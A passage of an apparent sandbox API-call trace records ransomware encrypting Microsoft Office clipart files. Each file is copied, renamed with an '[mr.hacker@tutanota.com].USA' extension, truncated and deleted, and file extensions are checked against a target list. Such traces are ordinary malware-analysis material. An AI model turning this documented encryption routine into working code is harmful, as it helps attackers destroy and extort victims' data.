Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.637] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.637] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.637] GetLastError () returned 0x0 [0271.637] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xf7c, lpOverlapped=0x0) returned 1 [0271.646] WriteFile (in: hFile=0x3ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0271.647] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.647] WriteFile (in: hFile=0x3ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.647] SetEndOfFile (hFile=0x3ac) returned 1 [0271.647] CloseHandle (hObject=0x3ac) returned 1 [0271.647] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.647] SetEndOfFile (hFile=0x328) returned 1 [0271.649] CloseHandle (hObject=0x328) returned 1 [0271.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.649] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01191_.wmf")) returned 1 [0271.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.649] lstrlenW (lpString=".doc") returned 4 [0271.649] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.649] lstrlenW (lpString=".docx") returned 5 [0271.649] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.649] lstrlenW (lpString=".pdf") returned 4 [0271.649] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.649] lstrlenW (lpString=".xls") returned 4 [0271.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.650] lstrlenW (lpString=".xlsx") returned 5 [0271.650] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.650] lstrlenW (lpString=".ppt") returned 4 [0271.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString=".zip") returned 4 [0271.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.650] lstrlenW (lpString=".rar") returned 4 [0271.650] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString=".bz2") returned 4 [0271.650] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString=".7z") returned 3 [0271.650] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString=".dbf") returned 4 [0271.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString=".1cd") returned 4 [0271.650] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString=".jpg") returned 4 [0271.650] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.650] lstrlenW (lpString=".doc") returned 4 [0271.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString=".docx") returned 5 [0271.650] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.650] lstrlenW (lpString=".pdf") returned 4 [0271.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.650] lstrlenW (lpString=".xls") returned 4 [0271.651] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.651] lstrlenW (lpString=".xlsx") returned 5 [0271.651] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.651] lstrlenW (lpString=".ppt") returned 4 [0271.651] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.651] lstrlenW (lpString=".zip") returned 4 [0271.651] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.651] lstrlenW (lpString=".rar") returned 4 [0271.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.651] lstrlenW (lpString=".bz2") returned 4 [0271.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.651] lstrlenW (lpString=".7z") returned 3 [0271.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.651] lstrlenW (lpString=".dbf") returned 4 [0271.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.651] lstrlenW (lpString=".1cd") returned 4 [0271.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 63 [0271.651] lstrlenW (lpString=".jpg") returned 4 [0271.651] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.651] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.651] lstrlenW (lpString="FD01658_.WMF") returned 12 [0271.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.673] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=17924) returned 1 [0271.673] CloseHandle (hObject=0x394) returned 1 [0271.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf")) returned 0x20 [0271.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.674] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.674] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.674] GetLastError () returned 0x0 [0271.674] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x4604, lpOverlapped=0x0) returned 1 [0271.678] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x4610, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x4610, lpOverlapped=0x0) returned 1 [0271.679] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.679] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.679] SetEndOfFile (hFile=0x384) returned 1 [0271.679] CloseHandle (hObject=0x384) returned 1 [0271.679] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.679] SetEndOfFile (hFile=0x394) returned 1 [0271.681] CloseHandle (hObject=0x394) returned 1 [0271.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf")) returned 1 [0271.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.681] lstrlenW (lpString=".doc") returned 4 [0271.681] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.681] lstrlenW (lpString=".docx") returned 5 [0271.681] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.681] lstrlenW (lpString=".pdf") returned 4 [0271.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString=".xls") returned 4 [0271.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.682] lstrlenW (lpString=".xlsx") returned 5 [0271.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.682] lstrlenW (lpString=".ppt") returned 4 [0271.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString=".zip") returned 4 [0271.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.682] lstrlenW (lpString=".rar") returned 4 [0271.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString=".bz2") returned 4 [0271.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString=".7z") returned 3 [0271.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString=".dbf") returned 4 [0271.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString=".1cd") returned 4 [0271.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString=".jpg") returned 4 [0271.682] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.682] lstrlenW (lpString=".doc") returned 4 [0271.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.682] lstrlenW (lpString=".docx") returned 5 [0271.683] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.683] lstrlenW (lpString=".pdf") returned 4 [0271.683] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString=".xls") returned 4 [0271.683] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.683] lstrlenW (lpString=".xlsx") returned 5 [0271.683] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.683] lstrlenW (lpString=".ppt") returned 4 [0271.683] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.683] lstrlenW (lpString=".zip") returned 4 [0271.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.683] lstrlenW (lpString=".rar") returned 4 [0271.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString=".bz2") returned 4 [0271.683] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString=".7z") returned 3 [0271.683] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.683] lstrlenW (lpString=".dbf") returned 4 [0271.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.683] lstrlenW (lpString=".1cd") returned 4 [0271.683] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63 [0271.683] lstrlenW (lpString=".jpg") returned 4 [0271.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.683] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.684] lstrlenW (lpString="FD01660_.WMF") returned 12 [0271.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.684] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=12958) returned 1 [0271.684] CloseHandle (hObject=0x394) returned 1 [0271.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf")) returned 0x20 [0271.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.684] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.684] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.685] GetLastError () returned 0x0 [0271.685] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x329e, lpOverlapped=0x0) returned 1 [0271.686] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x32a0, lpOverlapped=0x0) returned 1 [0271.687] ReadFile (in: hFile=0x394, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.687] WriteFile (in: hFile=0x384, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.687] SetEndOfFile (hFile=0x384) returned 1 [0271.687] CloseHandle (hObject=0x384) returned 1 [0271.687] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.687] SetEndOfFile (hFile=0x394) returned 1 [0271.689] CloseHandle (hObject=0x394) returned 1 [0271.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.689] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf")) returned 1 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString=".doc") returned 4 [0271.690] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString=".docx") returned 5 [0271.690] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.690] lstrlenW (lpString=".pdf") returned 4 [0271.690] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString=".xls") returned 4 [0271.690] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.690] lstrlenW (lpString=".xlsx") returned 5 [0271.690] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.690] lstrlenW (lpString=".ppt") returned 4 [0271.690] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString=".zip") returned 4 [0271.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.690] lstrlenW (lpString=".rar") returned 4 [0271.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString=".bz2") returned 4 [0271.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString=".7z") returned 3 [0271.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString=".dbf") returned 4 [0271.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString=".1cd") returned 4 [0271.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.690] lstrlenW (lpString=".jpg") returned 4 [0271.691] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.691] lstrlenW (lpString=".doc") returned 4 [0271.691] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString=".docx") returned 5 [0271.691] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.691] lstrlenW (lpString=".pdf") returned 4 [0271.691] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString=".xls") returned 4 [0271.691] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.691] lstrlenW (lpString=".xlsx") returned 5 [0271.691] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.691] lstrlenW (lpString=".ppt") returned 4 [0271.691] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.691] lstrlenW (lpString=".zip") returned 4 [0271.691] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.691] lstrlenW (lpString=".rar") returned 4 [0271.691] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString=".bz2") returned 4 [0271.691] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString=".7z") returned 3 [0271.691] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.691] lstrlenW (lpString=".dbf") returned 4 [0271.691] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.691] lstrlenW (lpString=".1cd") returned 4 [0271.692] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63 [0271.692] lstrlenW (lpString=".jpg") returned 4 [0271.692] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.692] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.692] lstrlenW (lpString="FD02068_.WMF") returned 12 [0271.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.692] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2488) returned 1 [0271.692] CloseHandle (hObject=0x394) returned 1 [0271.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf")) returned 0x20 [0271.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.693] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: 